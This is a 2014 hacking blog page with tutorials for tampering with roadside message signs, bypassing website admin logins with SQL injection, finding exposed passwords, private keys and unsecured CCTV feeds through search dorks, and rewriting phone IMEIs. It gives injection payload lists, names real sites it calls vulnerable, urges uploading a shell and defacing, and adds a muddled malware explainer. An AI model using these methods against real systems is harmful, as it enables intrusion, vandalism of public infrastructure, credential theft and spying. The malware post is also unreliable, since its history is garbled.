Pages

Monday, 30 June 2014

Hack Traffic Signals

Hack Traffic Signals

Road sign hacking means hacking the road sign which means you can control the road signs which are on the road side to tell the ways to which the road leads to. For example –the following road leads to los angels 50 kms blab la.

Although this traffic system is not much in practice in INDIA but very much popular in foreign countries. So as I always say that try all these on your own risk as this is totally ILLEGAL so be careful.
Most of the road sign are manufactured by IMAGO security Solution Company.

1.)    The access panel on the sign is generally protected by a small lock, but you may often see them left unlocked. Or if they are locked then u can unlock them using hammer or something like that. upon opening the access panel you will see some panels which are having display electronics.

2.)      The black control pad on that display electronics is attached by a curly cord, with a            keyboard on the front.

3.)     There your programming comes into existence. Scroll through the menu selection to “Instant Text”. Type whatever you want to get displayed on the screen. Hit ENTER to submit.You can now throw it up on the sign by selecting “Run w/out save” or some more pages can be added to it by selecting “ADD PAGES”.

Now you must be wondering how easy it is. But it’s not so easy. When you are going to change them you are being prompted for password. Guys n Gals that’s the main issue.  PASSWORD  . . . . . .

So the default password there is DOTS.

So go for it and you can change the display but what if some office personnel have changed it to something else.

Don’t worry you can reset it to dots by following the procedure:à

CTRL + SHIFT +DIPY

Using above will reset the password to DOTS and again do it by using DOTS as the password.

So enjoy all this stuff on your risk.

Enjoy:)

              ~~~jaii hoo~~~

Posted by at 2 comments:

Hack Website's Admin Panel using Basic SQL Injection

Hack Website's Admin Panel using Basic SQL Injection

You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).  I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.

Dorks: inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php
            inurl:admin/index.php
            inurl:adminlogin.aspx

# Try to make your own dorks also to get more success rate.

Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1

Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website.

Some websites which I got:

http://gimtech.in/Webadmin/AdminLogin.aspx

http://welkinindiagroup.com/admin/adminlogin.aspx

http://nobinsolutions.com/Adminlogin.aspx

Other InjecTion Queries:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

Enjoy:)

              ~~~jaii hoo~~~

Posted by at 2 comments:

Hacking FB Account Using Google Dork List

Hacking FB Account Using Google Dork List :-
:-
-----------------------------------------------------
Prerequisites: (This one is Easy!)
1. A modern webbrowser and a internet.
2. Time
[Level:Beginner]

Method 1: Facebook!We will be using a
google dork to find
usernames and passwords of many
accounts including Facebook!
The Dork: intext:charset_test= email=
default_persistent=
Enter that into Google, and you will be
presented with several sites
that have username and passwords lists!

Method 2: WordPress!
This will look for WordPress backup files
Which do contain the
passwords, and all data for the site!The
Dork: filetype:sql inurl:wpcontent/
backup-*

Method 3: WWWBoard!
This will look for the user and passwords of
WWWBoard usersThe
Dork: inurl:/wwwboard/passwd.txt

Method 4: FrontPage!
This will find all users and passwords,
similar to above.The Dork:
ext:pwd inurl:(service | authors |
administrators | users) "# -
FrontPage-"

Method 5: Symfony!This finds database
information and loginsThe
Dork: inurl:config/databases.yml -trac -
trunk -"Google Code" -source
-repository

Method 6: TeamSpeak! (big one!!!!!)This
will search for the
server.dbs file (a Sqlite database file With
the SuperAdmin username
and password!!!)The Dork: server-dbs
"intitle:index of"

Method 7: TeamSpeak2!!! (also big!)This
will find the log file which
has the Super Admin user and pass in the
Top 100 lines. Look for
"superadmin account info:"The Dork:
"inurl:Teamspeak2_RC2/server.log"

Method 8: Get Admin pass!Simple dork
which looks for all types of
admin infoThe Dork: "admin account info"
filetype:log

Method 9: Private keys! (not any more!)
This will find any .pem files
which contain private keys.The Dork:
filetype:pem pem intext:private
And the Ultimate one, the regular
directory full of passwords....

Method 10: The Dir of Passwords! Simple
one!The Dork: intitle:"Index
of..etc" passwd

Use At Own personal Risk

Enjoy:)

              ~~~jaii hoo~~~

Posted by at 8 comments:

Sunday, 29 June 2014

HACK CCTV CAMERAS AND CONTROL THEM

HACK CCTV CAMERAS AND CONTROL THEM

Ever wanted to spy on a business? A workplace, or a town? Or your just totally bored and got nothing else to do and want to fuck about with some CCTV!?! Well this tut is for you! You can hack into the cameras and control them too! What I am about to tell you is Google Hacking. No its not the type of hacking you may know or hear of, but it is STILL hacking. So be warned. Use this tut at your own risk.

Step 1: Go to Google! http://www.google.com

Step 2: Enter one of the following lines: (Note, Do not enter the whole lot, that won’t work!)

*inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”

Step 3: Find a website like this: http://67.53.48.2/CgiStart?page=Single&Language=0

Step 4: Open an link from that…and enjoy the hack… for further hack we  need tools

Further updates coming
Please keep sharing this blog

Enjoy:)

               ~~~jaii hoo~~~

Posted by at 3 comments:

How to write or change your IMEI on Android

How to write or change your IMEI on Android

This is a simple guide how you can rewrite you IMEI no after bricking it and repairing it back.
After getting Repaired your Android device you may get problem with your Network and that is because of No valid IMEI, for that there can be many reasons.
If your phone is Rooted then you can Write your IMEI no. with just a secret code you will not require to Connect your phone with computer with debugging mode and writing IMEI with any tool, that may again brick your phone so try this easy way To,
If you are searching for tools to change your IMEI then please note that Changing IMEI is illegal and this place is not for you
Write IMEI of your Android phone with secret code in Engineering mode:-
Just enter this code in dialler:- *#7465625# or * # * # 3646633 # * # *
Now Tap on Call pad or connectivity option or you have to slide the screen.
Just Look for CDS information (Common data service information) option.
You will see Radio information there and after tapping on it.
If you have dual SIM ANDROID then you will see TWO option select any one on which you want to write IMEI with.
Now you will have to put your IMEI no in this manner :- “AT +EGMR=1,7,"IMEI_1” and “AT +EGMR=1,10,"IMEI_2” (replace IMEI_1 and IMEI_2 with your IMEI no)  and tap on send command button.
for Example :- “AT =EGMR=1,7”9100XXXXXXXXXXXX”
CHECK OUT How to check Android phone condition with secret codes
NOTE :- This Info are provide for helping and education purpose don’t misuse it, It does not change your device id, So if you try to be smart then you will be caught for any illegal reason or changing you IMEI
This could save you from trying many tools on your pc.

Enjoy;)

                 ~~~jaii hoo~~~

Check out the screenshots for more help:-

Posted by at 1 comment:

Saturday, 28 June 2014

What Is A Malware

What Is A Malware

       What is Malware? Malware are tools and programs that one sets up to infect another’s system and directs them somewhere else.the latest malware exploit that was created back in November 2011.
In November 2011, a nasty exploit to computers that redirected DNS Servers was created and used. This nasty virus was soon diverted by the FBI, in possibly the most friendly and fair way our government has ever done. For months now the FBI has homed servers to divert and fix what this malware program caused, but on July 9th 2012 the FBI announced ending their operation and shut down these servers. The effects have been estimated to great measures, to the fears that millions of Americans will lose connection to the internet,and the world going up in flames due to lack of communication. Since the Feds announcement corporations like Google have announced programs that have been running now since the 23rd of May. These programs scan your
computer for this DNS switcher program "aka the nasty malware program".
Now, it is true most virus databases are able to track down and delete malware programs on your system, but in the new world with our new internet based technology, that may not be the case anymore. So what does this program do? What has been leaked out of the feds about it? Well you can rest assured our brother was arrested in November shortly after the release of his program. Due to this fact they are assured that they have fixed the problem, due to higher thinking we can only think they have over looked something.
The only thing we can hope for is that this will only affect a small handful of systems. Common users mostly. So what is malware? Malware are programs that force you to do what someone else wants. Malware programs create bot nets, using innocent peoples computers/common user systems as weapons without there knowledge. For the longest time apple users were told they wouldn’t have to worry about this issue. Late April, early May this was proven false which also made all systems at risk now.
So you’re probably wondering how one would download one of these programs,which is a really good question. Back in the dark ages, they had to be installed through third party programs from the downloads you got for games software from untrusted sources. Today, in the modern age of technology, these programs, like all viruses, can be automatically uploaded to your system through cookies and random file downloads websites through the many games we play online. Many of you readers are also at risk due to the fact IRC servers send data packets that may contain such files.
The only luck is that certain ISPs change up there DNS servers monthly, corporations like Comcast, while they do this they also release and renew IP address granting you probably the most open and free way to have anonymous web browsing at least for the first 20 minutes from the renewal.

Enjoy:)

               ~~~jaii hoo~~~

Posted by at 1 comment:

Friday, 27 June 2014

Some of Best Port Scanning Tools

Some of Best Port Scanning Tools

What is  port Scanning?
      You should understand what is port scanning .  Port scanning is the process of checking which port is opened and which ports are locked.  Just like a thief who searching for a gate opened house.

What is the Use?
   By finding which port is opened ,you can try to communicate with victim system remotely and access their data .  

Learn more about Port scanning.

EG:-

* 21: FTP
* 22: SSH
* 23: Telnet
* 53: Domain Name System
* 80: World Wide Web HTTP
* 119: Network News Transfer Protocol
* 443: HTTP over Transport Layer Security/Secure Sockets Layer
* 445: microsoft-ds, Server Message Block over TCP

If these ports are not secure a hacker can communicate with these ports and cause havoc
The list given below are some of the best port scanners
You can download from the links given below:
Nmap:
This tool developed by Fyodor is one of the best unix and windows based port scanners. This
advanced port scanner has a number of useful arguments that gives user a lot of control over the
process.
From:
   Insecure.org
Download:
  http://nmap.org/download.html

Superscan
A Windows-only port scanner, pinger, and resolver SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.
From
  http://www.foundstone.com/
Download
  http://www.foundstone.com/us/resources/proddesc/superscan4.html

Angry IP Scanner
A fast windows IP scanner and port scanner. Angry IP Scanner can perform basic
host discovery and port scans on Windows. Its binary file size is very small compared to other scanners and other pieces of information about the target hosts can be extended with a few plugins.

From
  http://www.angryziber.com/
Download
   http://www.angryziber.com/Download

Unicornscan :
Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering
and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses.

From
  http://www.unicornscan.org/
Download
   http://www.unicornscan.org/

Posted by at 1 comment:
Subscribe to: Posts (Atom)